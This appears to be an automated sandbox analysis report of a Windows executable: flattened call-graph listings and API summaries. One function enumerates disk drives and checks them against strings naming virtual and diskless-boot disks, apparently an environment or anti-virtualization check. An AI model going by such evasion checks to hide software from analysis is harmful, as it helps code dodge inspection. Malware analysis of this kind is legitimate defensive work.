91665 4042e1 91664->91665 91754 407510 91665->91754 91669 4063ab SimpleUString::operator= 91667->91669 92280 40d7e0 27 API calls 5 library calls 91667->92280 91670 408050 43 API calls 91669->91670 91685->91664 91933 4035b0 91896->91933 91934 403470 41 API calls 91933->91934 92213->91601 92214->91599 92215->91599 92217 51aca8 92216->92217 92219 51ac9a 92216->92219 92236 51ea9c 20 API calls _free 92217->92236 92219->92217 92222 51acd1 92219->92222 92221 405d6b 92221->91614 92222->92221 92238 51ea9c 20 API calls _free 92222->92238 92224 51acb0 92237 51b518 26 API calls std::runtime_error::runtime_error 92224->92237 92236->92224 92237->92221 92238->92224 92279->91667 92280->91669 92367->91491 92374->91484 92375->91482 92376->91482 91235 43b250 91244 4266e0 91235->91244 91239 43b275 91240 43b27e FreeLibrary 91239->91240 91241 43b28c 91239->91241 91240->91241 91242 43b293 FreeLibrary 91241->91242 91243 43b2a1 91241->91243 91242->91243 91245 433370 10 API calls 91244->91245 91246 42670a IsWindow 91245->91246 91247 426726 PeekMessageW 91246->91247 91248 42677d shared_ptr 91247->91248 91249 513805 _com_util::ConvertStringToBSTR 5 API calls 91248->91249 91250 4268c6 91249->91250 91251 43bcd0 42 API calls 2 library calls 91250->91251 91251->91239 92579 44ce90 92580 44ced6 92579->92580 92581 44d0be 92579->92581 92582 44cedc 92580->92582 92583 44d068 92580->92583 92584 44d31c 92581->92584 92585 44d0ca 92581->92585 92586 44cee7 92582->92586 92587 44d042 92582->92587 92592 44d076 SetEvent 92583->92592 92649 44cf9d shared_ptr 92583->92649 92588 44d4ee 92584->92588 92589 44d328 92584->92589 92590 44d0d0 92585->92590 92591 44d308 92585->92591 92594 44cef2 92586->92594 92595 44cfc3 92586->92595 92598 44d050 92587->92598 92587->92649 92614 44d545 ShowWindow 92588->92614 92588->92649 92596 44d4d6 92589->92596 92597 44d32e 92589->92597 92603 44d22c 92590->92603 92604 44d0ed 92590->92604 92605 44d24f 92590->92605 92606 44d2d8 92590->92606 92607 44d209 92590->92607 92590->92649 92593 
44d310 PostQuitMessage 92591->92593 92591->92649 92599 44d083 92592->92599 92600 44d0aa PostMessageW 92592->92600 92593->92649 92611 44cf03 92594->92611 92612 44cf0d 92594->92612 92594->92649 92619 44cff7 92595->92619 92595->92649 92601 44d4e3 92596->92601 92596->92649 92602 44d3fc 92597->92602 92650 44d33b 92597->92650 92921 450310 393 API calls 3 library calls 92598->92921 92609 44d09c 92599->92609 92610 44d08d SetWindowTextA 92599->92610 92600->92649 92930 450080 554 API calls 2 library calls 92601->92930 92602->92649 92913 43be40 92602->92913 92617 44d23a 92603->92617 92603->92649 92604->92649 92705 438b20 105 API calls 8 library calls 92604->92705 92618 44d266 92605->92618 92641 44d27a 92605->92641 92605->92649 92623 44d2ef 92606->92623 92606->92641 92606->92649 92616 44d217 92607->92616 92607->92649 92685 4511c0 92609->92685 92610->92609 92916 4549e0 124 API calls 2 library calls 92611->92916 92621 44cfa2 92612->92621 92622 44cf19 92612->92622 92625 408180 43 API calls 92614->92625 92923 450310 393 API calls 3 library calls 92616->92923 92924 450310 393 API calls 3 library calls 92617->92924 92630 43be40 10 API calls 92618->92630 92632 44cffc GetTickCount 92619->92632 92633 44d01f GetTickCount 92619->92633 92639 44cfb1 KillTimer 92621->92639 92621->92649 92634 41bf60 42 API calls 92622->92634 92635 43be40 10 API calls 92623->92635 92637 44d555 92625->92637 92628 513805 _com_util::ConvertStringToBSTR 5 API calls 92640 44d5bb 92628->92640 92630->92641 92631 41bf60 42 API calls 92642 44d289 GetTickCount 92631->92642 92632->92649 92633->92649 92643 44cf24 92634->92643 92635->92641 92636 44d426 92636->92649 92927 49c5e0 28 API calls 92636->92927 92644 44d55f GetProcAddress 92637->92644 92682 44cf08 shared_ptr 92637->92682 92638 44d12e 92706 446140 44 API calls 3 library calls 92638->92706 92920 4546a0 201 API calls 2 library calls 92639->92920 92641->92631 92647 44d2c2 92642->92647 92643->92649 92917 49c5e0 28 API calls 92643->92917 92644->92682 92925 451470 282 
API calls 3 library calls 92647->92925 92649->92628 92650->92649 92926 43fad0 114 API calls 2 library calls 92650->92926 92651 44d133 92707 41d430 135 API calls 6 library calls 92651->92707 92652 44d441 92652->92649 92928 43d6b0 52 API calls 4 library calls 92652->92928 92657 44d13c 92658 44d155 92657->92658 92708 446140 44 API calls 3 library calls 92657->92708 92922 436530 154 API calls 6 library calls 92658->92922 92662 44d150 92709 41d9d0 92662->92709 92663 44d15d 92834 4385c0 92663->92834 92667 44cf48 92667->92649 92918 49de80 121 API calls 2 library calls 92667->92918 92669 44d45a 92670 44d4ac shared_ptr 92669->92670 92676 44d5c6 92669->92676 92929 49ddf0 90 API calls 92670->92929 92675 44cf95 92919 49ddf0 90 API calls 92675->92919 92677 51b528 std::runtime_error::runtime_error 26 API calls 92676->92677 92680 44d5cb 92677->92680 92682->92649 92686 451206 92685->92686 92699 451253 92685->92699 92689 490850 75 API calls 92686->92689 92691 451221 92689->92691 92695 4909a0 182 API calls 92691->92695 92691->92699 92692 45127c 93027 41cb80 133 API calls 6 library calls 92692->93027 92693 45128f 93028 446140 44 API calls 3 library calls 92693->93028 92697 451236 92695->92697 92697->92699 93024 49c5e0 28 API calls 92697->93024 92698 451294 92700 513ac7 std::_Facet_Register 8 API calls 92698->92700 92699->92693 92931 451f10 92699->92931 92702 45129d GetCurrentProcessId SendMessageW 92700->92702 92702->92649 92703 451247 92703->92699 93025 49ddf0 90 API calls 92703->93025 92705->92638 92706->92651 92707->92657 92708->92662 92710 470690 27 API calls 92709->92710 92711 41da30 92710->92711 92713 41da7a 92711->92713 93053 41ed10 92711->93053 92714 41bf60 42 API calls 92713->92714 92715 41da7f 92714->92715 93343 470880 92715->93343 92718 471d90 27 API calls 92719 41daab 92718->92719 92720 470dd0 27 API calls 92719->92720 92721 41dab2 Concurrency::details::_AsyncTaskCollection::~_AsyncTaskCollection 92720->92721 92722 47f270 87 API calls 92721->92722 92723 41dae3 
92722->92723 92724 41dddc 92723->92724 93347 4220f0 27 API calls SimpleUString::operator= 92723->93347 92835 4385db 92834->92835 93464 437ed0 92835->93464 92837 43862f 92838 438638 92837->92838 92839 43864c 92837->92839 92840 437ed0 47 API calls 92838->92840 93483 4329e0 108 API calls 7 library calls 92839->93483 92840->92839 92842 4386d1 __Getcvt 92843 41bdd0 42 API calls 92842->92843 92844 438714 92843->92844 92845 438721 92844->92845 92846 438846 92844->92846 92914 513ac7 std::_Facet_Register 8 API calls 92913->92914 92915 43be6d GetCurrentProcessId PostMessageW 92914->92915 92915->92636 92916->92682 92917->92667 92918->92675 92919->92649 92920->92682 92921->92682 92922->92663 92923->92682 92924->92682 92925->92682 92926->92649 92927->92652 92928->92669 92929->92649 92930->92682 92932 451f5f ShowWindow EnableWindow 92931->92932 92934 452519 92932->92934 92935 451f8a 92932->92935 92938 41bf60 42 API calls 92934->92938 92936 452406 92935->92936 92937 451f93 92935->92937 92941 41bf60 42 API calls 92936->92941 92940 45269d InvalidateRect 92937->92940 92943 41bf60 42 API calls 92937->92943 92939 45251e 92938->92939 92942 45266f 92939->92942 92946 513ac7 std::_Facet_Register 8 API calls 92939->92946 92944 513805 _com_util::ConvertStringToBSTR 5 API calls 92940->92944 92945 45240b GetTickCount 92941->92945 92952 452691 GetTickCount 92942->92952 92953 452401 92942->92953 92947 451fa1 GetTickCount 92943->92947 92948 45126b 92944->92948 92949 45243f 92945->92949 92951 45253c SetWindowPos 92946->92951 92954 451fd3 92947->92954 93026 446140 44 API calls 3 library calls 92948->93026 92950 452501 GetTickCount 92949->92950 92955 513ac7 std::_Facet_Register 8 API calls 92949->92955 92957 452697 92950->92957 92951->92942 92966 4525cb 92951->92966 92952->92957 92953->92952 92959 408180 43 API calls 92954->92959 92958 45245a 92955->92958 92957->92940 93051 446140 44 API calls 3 library calls 92958->93051 92961 451fef 92959->92961 92962 452017 92961->92962 92963 451ff8 
GetProcAddress 92961->92963 93029 446140 44 API calls 3 library calls 92962->93029 92963->92962 92964 452483 SetWindowPos 92964->92950 93052 49c5e0 28 API calls 92966->93052 92969 45202a 93030 421f00 92969->93030 92972 45203f 92973 45237e 92972->92973 92974 513ac7 std::_Facet_Register 8 API calls 92972->92974 92973->92952 92977 452398 GetSystemMenu EnableMenuItem 92973->92977 92976 452053 92974->92976 92975 4525d8 92975->92942 92980 45260c GetClientRect ClientToScreen SetCursorPos 92975->92980 92984 41bf60 42 API calls 92976->92984 93047 49c5e0 28 API calls 92977->93047 92979 4523be 92981 4523d7 92979->92981 93048 49ddf0 90 API calls 92979->93048 92980->92942 93049 49c5e0 28 API calls 92981->93049 92985 4520cf 92984->92985 92985->92973 92988 4520d9 SetWindowPos 92985->92988 92989 452104 92988->92989 92990 4521a8 92988->92990 93024->92703 93025->92699 93026->92692 93027->92693 93028->92698 93029->92969 93031 513ac7 std::_Facet_Register 8 API calls 93030->93031 93032 421f41 GetCurrentProcessId PostMessageW 93031->93032 93032->92972 93047->92979 93048->92981 93051->92964 93052->92975 93054 415dc0 43 API calls 93053->93054 93071 41ed7f shared_ptr __Getcvt 93054->93071 93055 41f5ab 93056 513805 _com_util::ConvertStringToBSTR 5 API calls 93055->93056 93057 41f5c9 93056->93057 93057->92711 93058 415dc0 43 API calls 93058->93071 93059 41ee24 GetProcAddress 93059->93071 93060 41f578 93061 415dc0 43 API calls 93060->93061 93062 41f583 93061->93062 93062->93055 93063 41f58c GetProcAddress 93062->93063 93063->93055 93064 41eeab GetProcAddress 93064->93071 93065 408050 43 API calls 93065->93071 93066 41eeee GetProcAddress 93066->93071 93067 40b650 SimpleUString::operator= 27 API calls 93067->93071 93068 40b7a0 27 API calls 93068->93071 93069 41efce GetProcAddress 93069->93071 93070 46bc20 6 API calls 93070->93071 93071->93055 93071->93058 93071->93059 93071->93060 93071->93064 93071->93065 93071->93066 93071->93067 93071->93068 93071->93069 93071->93070 93073 41f563 
93071->93073 93354 46bb40 93071->93354 93073->93060 93074 41f5cf 93073->93074 93075 51b528 std::runtime_error::runtime_error 26 API calls 93074->93075 93076 41f5d4 93075->93076 93077 470690 27 API calls 93076->93077 93078 41f669 93077->93078 93079 41bf60 42 API calls 93078->93079 93080 41f675 93079->93080 93081 470880 27 API calls 93080->93081 93082 41f689 93081->93082 93083 471d90 27 API calls 93082->93083 93344 470895 93343->93344 93345 46fea0 27 API calls 93344->93345 93346 41da93 93345->93346 93346->92718 93355 46bb81 93354->93355 93356 46bb5e GetProcAddress 93354->93356 93357 513805 _com_util::ConvertStringToBSTR 5 API calls 93355->93357 93356->93355 93358 46bb93 93357->93358 93358->93071 93465 415dc0 43 API calls 93464->93465 93466 437ef5 93465->93466 93467 437f04 GetProcAddress 93466->93467 93468 437f29 93466->93468 93467->93468 93469 437ff1 93468->93469 93471 415dc0 43 API calls 93468->93471 93470 513805 _com_util::ConvertStringToBSTR 5 API calls 93469->93470 93472 438003 93470->93472 93473 437f61 93471->93473 93472->92837 93474 437f83 RegQueryValueExA 93473->93474 93475 437f6a GetProcAddress 93473->93475 93476 415dc0 43 API calls 93474->93476 93475->93474 93477 437fa8 93476->93477 93478 437fb1 GetProcAddress 93477->93478 93479 437fd0 93477->93479 93478->93479 93479->93469 93480 437fdc 93479->93480 93481 513805 _com_util::ConvertStringToBSTR 5 API calls 93480->93481 93482 437feb 93481->93482 93482->92837 93483->92842 87332 498850 87338 4a1cf0 GetPropW 87332->87338 87334 49885d 87335 49886b 87334->87335 87339 49a480 87334->87339 87338->87334 87344 49a4d6 _DebugHeapAllocator 87339->87344 87340 49a5f6 87355 49a60e GetCapture 87340->87355 87387 49a960 87340->87387 87341 49ab10 _DebugHeapAllocator 87345 49afb8 87341->87345 87346 49ac72 87341->87346 87342 49a9c7 SendMessageW 87447 49aa37 87342->87447 87343 49a583 RtlEnterCriticalSection 87347 49a5b3 87343->87347 87348 49a5e4 RtlLeaveCriticalSection 87343->87348 87344->87340 87344->87343 87344->87387 87547 5139d3 
5 API calls __Init_thread_wait 87344->87547 87353 49b180 87345->87353 87354 49afc3 87345->87354 87351 49ac78 87346->87351 87352 49af94 87346->87352 87504 513ac7 87347->87504 87348->87340 87350 49b6be 87350->87343 87358 49b6ce RtlInitializeCriticalSection 87350->87358 87365 49acd8 87351->87365 87366 49ae7c 87351->87366 87367 49ad1c 87351->87367 87368 49acbc 87351->87368 87369 49af40 RemovePropW 87351->87369 87370 49af12 InvalidateRect 87351->87370 87371 49ac94 87351->87371 87372 49ae07 ScreenToClient 87351->87372 87409 49ad54 87351->87409 87413 49ae93 87351->87413 87417 49a732 shared_ptr 87351->87417 87422 49acb7 _DebugHeapAllocator shared_ptr 87351->87422 87352->87422 87539 49a1c0 115 API calls _DebugHeapAllocator 87352->87539 87373 49b568 __Getcvt 87353->87373 87374 49b491 __Getcvt 87353->87374 87353->87422 87430 49b404 _DebugHeapAllocator 87353->87430 87359 49b079 __Getcvt 87354->87359 87360 49afc9 87354->87360 87355->87387 87408 49a61d _DebugHeapAllocator 87355->87408 87357 49a5ba 87362 49a5cb 87357->87362 87363 49a5d6 87357->87363 87548 513d5f 29 API calls __onexit 87358->87548 87377 49b08c GetClassNameW lstrcmpiW 87359->87377 87385 49afd9 87360->87385 87415 49afe5 87360->87415 87360->87422 87511 46be60 8 API calls _com_util::ConvertStringToBSTR 87362->87511 87363->87348 87379 49aceb BeginPaint 87365->87379 87380 49acdc 87365->87380 87537 4a2e20 6 API calls 2 library calls 87366->87537 87536 4a2b20 8 API calls 2 library calls 87367->87536 87535 498890 121 API calls 2 library calls 87368->87535 87407 49af71 87369->87407 87370->87422 87376 49aca0 87371->87376 87533 499ac0 115 API calls 2 library calls 87371->87533 87388 49ae3a 87372->87388 87389 49ae61 SendMessageW 87372->87389 87393 49b57b GetClassNameW lstrcmpiW 87373->87393 87404 49b4a4 GetClassNameW lstrcmpiW 87374->87404 87534 498890 121 API calls 2 library calls 87376->87534 87395 49b0ba SetFocus 87377->87395 87431 49b0c3 _DebugHeapAllocator 87377->87431 87455 4996e0 87379->87455 87396 4996e0 28 API calls 
87380->87396 87382 49add7 LoadCursorW SetCursor 87382->87417 87384 49b6e3 87549 513989 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 87384->87549 87540 4993b0 66 API calls 2 library calls 87385->87540 87386 49a71e CallWindowProcW 87386->87417 87387->87341 87387->87342 87388->87389 87388->87422 87389->87422 87391 49a5d2 87391->87363 87405 49b5a9 SetFocus 87393->87405 87434 49b5b2 _DebugHeapAllocator 87393->87434 87395->87431 87396->87417 87397 49a635 _DebugHeapAllocator 87397->87386 87397->87417 87412 49b4d2 SetFocus 87404->87412 87437 49b4db _DebugHeapAllocator 87404->87437 87405->87434 87487 496970 87407->87487 87408->87397 87433 49a703 87408->87433 87409->87382 87429 49ad8b 87409->87429 87410 49b6ed 87410->87343 87411 49887d 87412->87437 87413->87386 87484 4992f0 87413->87484 87419 49b031 KillTimer 87415->87419 87415->87422 87513 513805 87417->87513 87418 49b13f lstrcmpiW 87421 49b159 87418->87421 87418->87422 87419->87422 87421->87422 87542 49a1c0 115 API calls _DebugHeapAllocator 87421->87542 87422->87417 87546 4a1cf0 GetPropW 87422->87546 87424 49aee4 73A0A570 87426 4996e0 28 API calls 87424->87426 87425 49af06 87538 4a3010 GetPropW SetWindowRgn 87425->87538 87426->87422 87429->87417 87435 49ada8 LoadCursorW SetCursor 87429->87435 87430->87422 87432 49b477 87430->87432 87431->87418 87438 49b12a 87431->87438 87543 49cce0 53 API calls _com_util::ConvertStringToBSTR 87432->87543 87512 49cce0 53 API calls _com_util::ConvertStringToBSTR 87433->87512 87434->87421 87441 49b625 87434->87441 87435->87417 87437->87421 87440 49b54e 87437->87440 87541 49cce0 53 API calls _com_util::ConvertStringToBSTR 87438->87541 87439 49b48c 87439->87422 87544 49cce0 53 API calls _com_util::ConvertStringToBSTR 87440->87544 87545 49cce0 53 API calls _com_util::ConvertStringToBSTR 87441->87545 87446 49b563 87446->87421 87447->87341 87449 49ab15 _DebugHeapAllocator 87447->87449 87520 49dc10 87447->87520 87449->87341 87450 49ab84 87449->87450 87452 49ab91 
_DebugHeapAllocator 87449->87452 87531 49cce0 53 API calls _com_util::ConvertStringToBSTR 87450->87531 87452->87341 87453 49abe9 87452->87453 87532 49cce0 53 API calls _com_util::ConvertStringToBSTR 87453->87532 87456 49970e _DebugHeapAllocator 87455->87456 87457 499aa5 87456->87457 87459 499743 GetClientRect 87456->87459 87460 499735 DeleteObject 87456->87460 87458 513805 _com_util::ConvertStringToBSTR 5 API calls 87457->87458 87461 499ab1 EndPaint 87458->87461 87462 499758 87459->87462 87460->87459 87461->87417 87463 499799 SelectObject 87462->87463 87481 4997b2 _DebugHeapAllocator 87463->87481 87464 49992a 87465 49993b IsWindow 87464->87465 87467 499a64 87464->87467 87466 49994c 87465->87466 87465->87467 87466->87467 87468 499962 GetWindowRect 87466->87468 87469 499a90 SelectObject DeleteDC 87467->87469 87470 499993 87468->87470 87469->87457 87471 4999e9 HideCaret 87470->87471 87472 4999c2 IsWindow 87470->87472 87474 4999f2 UpdateLayeredWindow 87471->87474 87472->87471 87473 4999c9 87472->87473 87473->87471 87478 4999db KillTimer 87473->87478 87475 499a59 ShowCaret 87474->87475 87476 499a29 IsWindow 87474->87476 87475->87469 87476->87475 87477 499a30 87476->87477 87477->87475 87479 499a42 GetCaretBlinkTime SetTimer 87477->87479 87478->87474 87479->87469 87480 49dc10 7 API calls 87480->87481 87481->87464 87481->87480 87482 499875 CreateRectRgn SelectClipRgn SetViewportOrgEx 87481->87482 87483 4998d2 SetViewportOrgEx SelectClipRgn DeleteObject 87482->87483 87483->87481 87485 4992fa IsWindow 87484->87485 87486 499305 87484->87486 87485->87486 87486->87424 87486->87425 87488 4969aa DeleteObject 87487->87488 87489 4969b4 87487->87489 87488->87489 87490 4969bb DeleteObject 87489->87490 87495 4969c5 87489->87495 87490->87495 87491 496a6a 87550 49bba0 87491->87550 87493 496b0a SetPropW 87494 496b21 87493->87494 87496 496b40 shared_ptr 87493->87496 87494->87496 87499 496bb7 87494->87499 87495->87491 87557 4955f0 27 API calls 3 library calls 87495->87557 87558 49c3e0 26 
90601->90550 90602->90571 90604 49f931 90603->90604 90614 49b910 90604->90614 90606 49f98d __Getcvt 90606->90576 90608 4a0cdb 90607->90608 90609 4a0d18 90607->90609 90608->90609 90617 491810 90608->90617 90609->90577 90615 513ac7 std::_Facet_Register 8 API calls 90614->90615 90616 49b917 90615->90616 90616->90606 90666 491830 90617->90666 90667 513ac7 std::_Facet_Register 8 API calls 90666->90667 90670 491860 90667->90670 90669 491904 90673 4918d9 90670->90673 90676 4918e6 90670->90676 90675 51f098 ___std_exception_copy 26 API calls 90673->90675 90675->90676 90677 491660 40 API calls 2 library calls 90676->90677 90677->90669 90756 49f9ff IsWindow 90755->90756 90790 49fb6a 90755->90790 90757 49fa0e 90756->90757 90756->90790 90760 4c9950 27 API calls 90757->90760 90757->90790 90758 513805 _com_util::ConvertStringToBSTR 5 API calls 90759 49fb84 90758->90759 90759->90583 90761 49fa31 90760->90761 90762 4c9920 27 API calls 90761->90762 90763 49fa4e 90762->90763 90764 4c9920 27 API calls 90763->90764 90768 49fa55 shared_ptr 90764->90768 90765 49fad1 90766 408a10 26 API calls 90765->90766 90767 49fae0 90766->90767 90769 513ac7 std::_Facet_Register 8 API calls 90767->90769 90767->90790 90768->90765 90770 49fc18 90768->90770 90768->90790 90771 49faef 90769->90771 90772 51b528 std::runtime_error::runtime_error 26 API calls 90770->90772 90773 49fb0f 90771->90773 90870 496700 27 API calls 90771->90870 90774 49fc1d 90772->90774 90843 497640 90773->90843 90776 4a00c5 90774->90776 90778 49fc66 90774->90778 90779 513805 _com_util::ConvertStringToBSTR 5 API calls 90776->90779 90780 408050 43 API calls 90778->90780 90781 4a00df 90779->90781 90782 49fc6c 90780->90782 90781->90583 90873 46d980 6 API calls _com_util::ConvertStringToBSTR 90782->90873 90785 49fc73 90785->90776 90790->90758 90844 497673 90843->90844 90870->90773 90873->90785 91204->90590 91205->90597 91206->90592 91208 524f47 _Atexit 91207->91208 91209 524f5b 91208->91209 91210 524f4e GetLastError RtlExitUserThread 
91208->91210 91211 534703 __Toupper 38 API calls 91209->91211 91210->91209 91212 524f60 91211->91212 91213 5334f2 _Atexit 10 API calls 91212->91213 91214 524f6b 91213->91214 91216 524f76 91214->91216 91230 533425 10 API calls 2 library calls 91214->91230 91223 46a500 91216->91223 91218 52521f 23 API calls 91219 524f9a 91218->91219 91231 52df90 20 API calls 2 library calls 91219->91231 91221 524fab 91224 46a59f 91223->91224 91225 46a50f WaitForSingleObject 91223->91225 91224->91218 91226 46a565 SendMessageW 91225->91226 91227 46a525 PostMessageW WaitForSingleObject 91225->91227 91226->91224 91228 46a580 91226->91228 91227->91226 91227->91227 91229 46a586 Sleep SendMessageW 91228->91229 91229->91224 91229->91229 91230->91216 91231->91221 93612 46a370 93613 46a391 93612->93613 93614 46a3a1 93613->93614 93615 46a47a 93613->93615 93618 46a3a3 93614->93618 93628 46a3c7 93614->93628 93616 46a4a1 93615->93616 93617 46a481 93615->93617 93619 46a4d4 93616->93619 93620 46a4a5 EnableWindow ShowWindow ShowWindow KiUserCallbackDispatcher 93616->93620 93631 513805 _com_util::ConvertStringToBSTR 5 API calls 93617->93631 93618->93617 93622 46a3b3 93618->93622 93624 513805 _com_util::ConvertStringToBSTR 5 API calls 93619->93624 93620->93619 93621 46a463 93625 513805 _com_util::ConvertStringToBSTR 5 API calls 93621->93625 93623 513805 _com_util::ConvertStringToBSTR 5 API calls 93622->93623 93626 46a3c1 93623->93626 93627 46a4e5 93624->93627 93629 46a474 93625->93629 93628->93621 93639 49c5e0 28 API calls 93628->93639 93632 46a49b 93631->93632 93633 46a412 __Getcvt 93633->93621 93640 43f340 51 API calls 93633->93640 93635 46a440 93641 49de80 121 API calls 2 library calls 93635->93641 93637 46a45b 93642 49ddf0 90 API calls 93637->93642 93639->93633 93640->93635 93641->93637 93642->93621 89666 482570 89667 48257e 89666->89667 89670 4825a0 89667->89670 89671 482759 89670->89671 89672 4825e1 89670->89672 89673 482763 RtlEnterCriticalSection 89671->89673 89688 482591 89671->89688 89674 
4825e8 89672->89674 89675 48262f RtlEnterCriticalSection 89672->89675 89678 482799 numpunct 89673->89678 89679 482793 89673->89679 89681 4825f9 GetCurrentProcessId 89674->89681 89674->89688 89676 482660 RtlLeaveCriticalSection 89675->89676 89677 482673 numpunct 89675->89677 89676->89688 89699 482900 5 API calls SimpleUString::operator= 89677->89699 89700 482900 5 API calls SimpleUString::operator= 89678->89700 89680 482840 RtlLeaveCriticalSection 89679->89680 89680->89688 89682 48260d 89681->89682 89681->89688 89687 48261b SetEvent 89682->89687 89682->89688 89685 482693 GetTickCount 89689 4826a8 GetTickCount 89685->89689 89690 4826e5 GetCurrentProcessId PostMessageW 89685->89690 89686 4827b6 GetTickCount 89691 4827ee GetCurrentProcessId PostMessageW 89686->89691 89692 4827d1 GetTickCount 89686->89692 89687->89688 89689->89690 89693 4826bf GetTickCount SetTimer 89689->89693 89695 482717 SimpleUString::operator= 89690->89695 89694 48281c SimpleUString::operator= 89691->89694 89692->89691 89692->89694 89698 48271e RtlLeaveCriticalSection 89693->89698 89696 48283c 89694->89696 89697 48282e PostMessageW 89694->89697 89695->89698 89696->89680 89697->89696 89698->89688 89699->89685 89700->89686 89701 4d7d30 89702 4d7d3d 89701->89702 89704 4d7d44 89701->89704 89705 4d7e10 89702->89705 89708 4d8000 89705->89708 89707 4d7e1d 89707->89704 89709 4d8018 89708->89709 89710 4d8014 89708->89710 89711 4d805e 89709->89711 89718 4ddfa0 53 API calls 89709->89718 89710->89707 89714 4d8079 89711->89714 89715 4d806c 89711->89715 89719 4d80c0 55 API calls _com_util::ConvertStringToBSTR 89711->89719 89714->89707 89715->89714 89720 4e8aa0 42 API calls 89715->89720 89717 4d80a1 89717->89707 89718->89711 89719->89715 89720->89717

Control-flow Graph (function 00468E20)
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004552D0: RtlInitializeCriticalSection.NTDLL(00597F68), ref: 00455352
                                                                                                                                                                                                            • Part of subcall function 004552D0: __Init_thread_footer.LIBCMT ref: 0045536E
                                                                                                                                                                                                            • Part of subcall function 004552D0: RtlEnterCriticalSection.NTDLL ref: 00455389
                                                                                                                                                                                                            • Part of subcall function 004552D0: RtlLeaveCriticalSection.NTDLL(00597F68), ref: 004553E1
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00468ED4
                                                                                                                                                                                                          • SetupDiGetClassDevsW.SETUPAPI(00000000,00000000,00000000,0000000E,00000000,00000020,7591F550), ref: 00468EE4
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00468F4C
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00468FC2
                                                                                                                                                                                                          • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,00000007,00000000,?,000007FE,00000000), ref: 00468FE9
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0046904C
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00466E87), ref: 004690D0
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469113
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469156
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469199
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004691DC
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0046921F
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469262
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004692A5
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004692E8
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0046932B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469377
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004693C6
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469415
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469464
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004694B3
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469502
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469551
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004695A0
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004695EB
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004697C9
                                                                                                                                                                                                          • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 004697D7
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlInitializeCriticalSection.NTDLL(00597B94), ref: 004080BE
                                                                                                                                                                                                            • Part of subcall function 00408050: __Init_thread_footer.LIBCMT ref: 004080DA
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlEnterCriticalSection.NTDLL(00597B94), ref: 004080F5
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlLeaveCriticalSection.NTDLL(00597B94), ref: 0040814B
                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$CriticalSection$Setup$DeviceEnterInit_thread_footerInitializeLeave$ClassDestroyDevsInfoListPropertyRegistry
                                                                                                                                                                                                          • String ID: A$DiskDrive$Info$List$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$alddisk$bnvirtualscsihba$bxp virtual$ccboot$deepin$diskless$evsW$hin virtual$kb.mdisk$kic.disk$msft virtual$mzd.live$netzone$nmenu$obm virtual$richdisk$s.t. virtual$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$vdiskbus$vhd cms$vice$vnd scsi

Control-flow Graph (function 00466CF0)
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlInitializeCriticalSection.NTDLL(00597C18), ref: 00413AAE
                                                                                                                                                                                                            • Part of subcall function 00413A40: __Init_thread_footer.LIBCMT ref: 00413ACA
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlEnterCriticalSection.NTDLL(00597C18), ref: 00413AE5
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlLeaveCriticalSection.NTDLL(00597C18), ref: 00413B41
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00466D55
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00466D77
